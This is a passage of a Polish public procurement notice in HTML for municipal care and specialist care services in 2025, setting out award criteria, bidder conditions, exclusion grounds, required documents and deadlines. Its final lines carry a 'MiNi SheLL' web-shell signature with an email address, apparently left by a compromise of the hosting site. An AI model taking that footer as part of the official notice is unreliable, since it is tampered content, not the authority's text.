opiekuńcze (ale także usługi opiekuńcze) mają być świadczone przez osoby posiadające kwalifikacje<br/>do wykonywania zawodu pracownika socjalnego, psychologa, pedagoga, logopedy, terapeuty zajęciowego, pielęgniarki,<br/>asystenta osoby niepełnosprawnej, opiekunki środowiskowej, specjalisty w zakresie rehabilitacji medycznej, fizjoterapeuty<br/>lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone specjalistyczne usługi.<br/>Szacunkowo przedmiot zamówienia obejmuje:<br/> usługi opiekuńcze (zwykłe) – średniomiesięcznie około 112 godzin, co wyniesie około 1344 godzin w skali zamówienia,<br/> specjalistyczne usługi opiekuńcze – średniomiesięcznie około 211 godzin miesięcznie, co wyniesie około 2532 godziny w<br/>skali zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312100-0 - Usługi opieki dziennej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</p> <p class="mb-0">85311100-3 - Usługi opieki społecznej dla osób starszych</p> <p class="mb-0">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej, Zamawiający będzie się kierował następującymi kryteriami:<br/>1) cena oferty - waga 60 %<br/>2) doświadczenie osób bezpośrednio realizujących usługi opiekuńcze - waga 40 %<br/>2. Każdy z Wykonawców otrzyma odpowiednią ilość punktów, wyliczoną w następujący sposób:<br/>1) w zakresie kryterium nr 1 – cena oferty:<br/>każdej ofercie niepodlegającej odrzuceniu zostanie przyznana liczba punktów, którą można uzyskać w tym kryterium i zostanie<br/>obliczona wg następującego wzoru:<br/>najniższa cena brutto oferty niepodlegającej odrzuceniu<br/>Cena (C) = ---------------------------------------------------------------------------------- x 60 pkt.<br/>cena brutto oferty badanej<br/>a) podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu<br/>Ofertowym.<br/>b) cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2) w zakresie kryterium nr 2 – doświadczenie osób bezpośrednio realizujących usługi opiekuńcze i specjalistyczne usługi<br/>opiekuńcze, oferta otrzyma punkty według następującej zasady:<br/>- 40 pkt. otrzyma Wykonawca, który przedstawi wykaz osób, spośród których co najmniej 3 posiada 5-letnie i większe doświadczenie<br/>w zakresie świadczenia usług opiekuńczych i specjalistycznych usług opiekuńczych,<br/>- 20 pkt. otrzyma Wykonawca, który przedstawi wykaz osób, spośród których co najmniej 2 posiada 5-letnie i większe doświadczenie<br/>w zakresie świadczenia usług opiekuńczych i specjalistycznych usług opiekuńczych,<br/>- 10 pkt. otrzyma Wykonawca, który przedstawi wykaz osób, spośród których co najmniej 1 posiada 5-letnie i większe doświadczenie<br/>w zakresie świadczenia usług opiekuńczych i specjalistycznych usług opiekuńczych,<br/>- 0 pkt. otrzyma podmiot, który przedstawi wykaz osób, spośród których żadna osoba nie posiada 5-letniego i większego<br/>doświadczenia w zakresie świadczenia usług opiekuńczych i specjalistycznych usług opiekuńczych.<br/>3) Doświadczenie personelu będzie oceniane na podstawie wykazu osób skierowanych do realizacji zadania/usług (Zał. Nr 5).<br/>Zatrudnienie do realizacji zadania minimum 6 osób w tym: 3 osoby do realizacji usług opiekuńczych i 3 osoby do realizacji<br/>specjalistycznych usług opiekuńczych.<br/>3. Liczba punktów przyznana ofercie badanej jest sumą punktów otrzymanych w kryteriach „cena” i „doświadczenie personelu”. Za<br/>ofertę najkorzystniejszą będzie uznana oferta, która przy uwzględnieniu powyższych kryteriów i ich wag otrzyma najwyższą<br/>punktację – maksymalnie 100 pkt.<br/>4. Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (tj. Dz.U. z 2024 r. poz. 361, z późn.zm.), dla celów zastosowania<br/>kryterium „cena” Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby<br/>obowiązek rozliczyć.<br/>5. Przy obliczaniu punktów, Zamawiający zastosuje zaokrąglenie do dwóch miejsc po przecinku według zasady, że trzecia cyfra po<br/>przecinku od 5 w górę powoduje zaokrąglenie drugiej cyfry po przecinku w górę o 1. Jeśli trzecia cyfra po przecinku jest mniejsza niż<br/>5, to druga cyfra po przecinku nie ulega zmianie.<br/>6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym<br/>zaoferowanej ceny.<br/>7. Zamawiający powiadomi o wyniku postępowania przesyłając zawiadomienie wszystkim Wykonawcom, którzy złożyli oferty oraz<br/>poprzez zamieszczenie stosownej informacji na platformie e-Zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osób bezpośrednio realizujących usługi opiekuńcze</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli przedstawi wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją do dysponowania tymi osobami Załącznik nr 5 do SWZ.<br/>Zamawiający uzna warunek za spełniony jeżeli wykonawca będzie dysponował minimum 3 osobami, które będą<br/>uczestniczyć w wykonywaniu zamówienia w zakresie usług opiekuńczych zwykłych oraz minimum 3 osobami, które będą<br/>uczestniczyć w wykonywaniu zamówienia w zakresie specjalistycznych usług opiekuńczych i posiadają, w celu wykonania<br/>zamówienia, niezbędne kwalifikacje zawodowe określone Rozporządzeniem Ministra Polityki Społecznej z dnia 22 września<br/>2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz. U. z 2024 r., poz. 816).<br/>3. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu oraz o<br/>spełnianiu warunków udziału w postępowaniu – zgodnie z Załącznikiem nr 2 do SWZ.<br/>W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu na podstawie art.7 ust.1 ustawy z dnia 13<br/>kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (tj. Dz.U. 2023 r., poz.1497 ze zmianami) Zamawiający żąda oświadczenia Wykonawcy, zgodnie z<br/>Załącznikiem nr 1 do SWZ.<br/>2. Informacje zawarte w oświadczeniach, o których mowa w ust. 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3. Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub<br/>dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (tj. Dz.U. z 2024 r., poz. 1616), z innym<br/>wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej –<br/>Załącznik nr 4 do SWZ;<br/>2) wykaz osób skierowanych do realizacji usług zgodnie z Załącznikiem nr 5 do SWZ.<br/>5. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>1) może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu<br/>ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał<br/>w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp dane umożliwiające dostęp do tych środków;<br/>2) podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art.<br/>125 ust. 1 Pzp.<br/>6. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli<br/>Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>7. W zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w<br/>postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia<br/>2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający<br/>od wykonawcy (Dz.U. z 2020 r., poz. 2415) zmienione Rozporządzeniem Ministra Rozwoju i Technologii z dnia 3 sierpnia 2023r.<br/>zmieniające rozporządzenie w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 r., poz. 2452).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych w art. 108 ust. 1<br/>ustawy Pzp; będącego osobą fizyczną, którego prawomocnie skazano za przestępstwo:<br/>a)udziału w zorganizowanej grupie przestępczej albo związku mającym na celu popełnienie przestępstwa lub przestępstwa<br/>skarbowego, o którym mowa w art. 258 Kodeksu karnego,<br/>b)handlu ludźmi, o którym mowa w art. 189a Kodeksu karnego, c)o którym mowa w art. 228-230a, art. 250a Kodeksu karnego, w art. 46-48 ustawy z dnia 25 czerwca 2010 r. o sporcie (Dz. U. z<br/>2024 r. poz. 1488) lub w art. 54 ust. 1-4 ustawy z dnia 12 maja 2011 r. o refundacji leków, środków spożywczych specjalnego<br/>przeznaczenia żywieniowego oraz wyrobów medycznych (t.j. Dz. U. z 2024 r. poz. 930), d) finansowania przestępstwa o charakterze<br/>terrorystycznym, o którym mowa w art. 165a Kodeksu karnego, lub przestępstwo udaremnienia lub utrudniania stwierdzenia<br/>przestępnego pochodzenia pieniędzy lub ukrywania ich pochodzenia, o którym mowa w art. 299 Kodeksu karnego,<br/>e)o charakterze terrorystycznym, o którym mowa w art. 115 § 20 Kodeksu karnego, lub mające na celu popełnienie tego<br/>przestępstwa,<br/>f)powierzenia wykonywania pracy małoletniemu cudzoziemcowi, o którym mowa w art.9 ust. 2 ustawy z dnia 15 czerwca 2012 r. o<br/>skutkach powierzania wykonywania pracy cudzoziemcom przebywającym wbrew przepisom na terytorium Rzeczypospolitej Polskiej<br/>(Dz. U. z 2021 r. poz. 1745),<br/>g)przeciwko obrotowi gospodarczemu, o którym mowa w art. 296-307 Kodeksu karnego, przestępstwo oszustwa, o którym mowa w<br/>art. 286 Kodeksu karnego, przestępstwo przeciwko wiarygodności dokumentów, o których mowa w art. 270-277d Kodeksu karnego,<br/>lub przestępstwo skarbowe,<br/>h)o którym mowa w art. 9 ust. 1 i 3 lub art. 10 ustawy z dnia 15 czerwca 2012 r. o skutkach powierzenia wykonywania pracy<br/>cudzoziemcom przebywającym wbrew przepisom na terytorium Rzeczypospolitej Polskiej – lub za odpowiedni czyn zabroniony<br/>określony w przepisach prawa obcego;<br/>2)jeżeli urzędującego członka jego organu zarządzającego lub nadzorczego, wspólnika spółki w spółce jawnej lub partnerskiej albo<br/>komplementariusza w spółce komandytowej lub komandytowo-akcyjnej lub prokurenta prawomocnie skazano za przestępstwo, o<br/>którym mowa w pkt 1;<br/>3)wobec którego wydano prawomocny wyrok sądu lub ostateczną decyzję administracyjną o zaleganiu z uiszczeniem podatków,<br/>opłat lub składek na ubezpieczenie społeczne lub zdrowotne, chyba że Wykonawca odpowiednio przed upływem terminu do<br/>składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert dokonał płatności<br/>należnych podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł<br/>wiążące porozumienie w sprawie spłaty tych należności;<br/>4)wobec którego prawomocnie orzeczono zakaz ubiegania się o zamówienia publiczne;<br/>5)jeżeli Zamawiający może stwierdzić, na podstawie wiarygodnych przesłanek, że Wykonawca zawarł z innymi Wykonawcami<br/>porozumienie mające na celu zakłócenie konkurencji, w szczególności jeżeli należąc do tej samej grupy kapitałowej w rozumieniu<br/>ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, złożyli odrębne oferty, oferty częściowe lub wnioski o<br/>dopuszczenie do udziału w postępowaniu, chyba że wykażą, że przygotowali te oferty lub wnioski niezależnie od siebie;<br/>6)jeżeli, w przypadkach, o których mowa w art. 85 ust. 1, doszło do zakłócenia konkurencji wynikającego z wcześniejszego<br/>zaangażowania tego Wykonawcy lub podmiotu, który należy z Wykonawcą do tej samej grupy kapitałowej w rozumieniu ustawy z<br/>dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, chyba że spowodowane tym zakłócenie konkurencji może być<br/>wyeliminowane w inny sposób niż przez wykluczenie Wykonawcy z udziału w postępowaniu o udzielenie zamówienia; 7) oraz<br/>wskazanych w art. 109 ust. 1 pkt 4 ustawy Pzp,<br/>3.Wykluczenie Wykonawcy następuje zgodnie z art. 111 ustawy Pzp.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Wykonawca może złożyć tylko jedną ofertę.<br/>2. Treść oferty musi odpowiadać treści SWZ.<br/>3. Ofertę składa się na Formularzu Ofertowym – zgodnie z Załącznikiem nr 1 do SWZ. Wraz z ofertą Wykonawca jest<br/>zobowiązany złożyć:<br/>1) oświadczenia, o których mowa w Rozdziale IX pkt 1 SWZ;<br/>2) zobowiązanie innego podmiotu, o którym mowa w Rozdziale IX pkt 3 SWZ (jeżeli dotyczy),<br/>3) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy).<br/>4. Oferta powinna być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy, zgodnie z formą reprezentacji<br/>Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez<br/>upełnomocnionego przedstawiciela Wykonawcy.<br/>5. Oferta oraz pozostałe oświadczenia i dokumenty, dla których Zamawiający określił wzory w formie formularzy<br/>zamieszczonych w załącznikach do SWZ, powinny być sporządzone zgodnie z tymi wzorami, co do treści oraz opisu kolumn<br/>i wierszy.<br/>6. Ofertę składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym lub kwalifikowanym podpisem elektronicznym.<br/>7. Oferta powinna być sporządzona w języku polskim. Każdy dokument składający się na ofertę powinien być czytelny.<br/>8. Jeśli oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o<br/>zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2022r., poz. 1233 ze zmianami), Wykonawca powinien nie później niż w<br/>terminie składania ofert, zastrzec, że nie mogą one być udostępnione oraz wykazać, iż zastrzeżone informacje stanowią<br/>tajemnicę przedsiębiorstwa.<br/>9. Podmiotowe środki dowodowe lub inne dokumenty, w tym dokumenty potwierdzające umocowanie do reprezentowania,<br/>sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski.<br/>10. Wszystkie koszty związane z uczestnictwem w postępowaniu, w szczególności z przygotowaniem i złożeniem oferty<br/>ponosi Wykonawca składający ofertę. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełny opis wymaganych oświadczeń i dokumentów zawiera SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach<br/>technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z<br/>nimi stosunków prawnych.<br/>2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą<br/>polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi do realizacji których te<br/>zdolności są wymagane.<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Wzór oświadczenia stanowi Załącznik nr 3 do SWZ.<br/>4. Zamawiający ocenia, czy udostępniane wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub<br/>zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu, a także bada, czy nie<br/>zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem wykonawcy.<br/>5. Jeżeli zdolności techniczne lub zawodowe podmiotu udostępniającego zasoby nie potwierdzają spełniania przez<br/>wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, zamawiający<br/>żąda, aby wykonawca w terminie określonym przez zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami<br/>albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>6. UWAGA: Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby.<br/>7. UWAGA: Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>przedstawia, wraz z oświadczeniem, o którym mowa w Rozdziale VIII pkt. 1 SWZ, także oświadczenie podmiotu<br/>udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków<br/>udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby, zgodnie z katalogiem dokumentów<br/>określonych w Rozdziale IX SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia: https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-25 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> WYKAZ ZAŁĄCZNIKÓW DO SWZ<br/>Załącznik nr 1 Wzór formularza ofertowego<br/>Załącznik nr 2 Oświadczenie o braku podstaw do wykluczenia i o spełnianiu warunków udziału w postępowaniu<br/>Załącznik nr 3 Zobowiązanie innego podmiotu do udostępnienia niezbędnych zasobów<br/>Załącznik nr 4 Oświadczenie dotyczące przynależności lub braku przynależności do tej samej grupy kapitałowej<br/>Załącznik nr 5 Wykaz osób kierowanych do realizacji zamówienia<br/>Załącznik nr 6 Projekt umowy

Creat By MiNi SheLL
Email: jattceo@gmail.com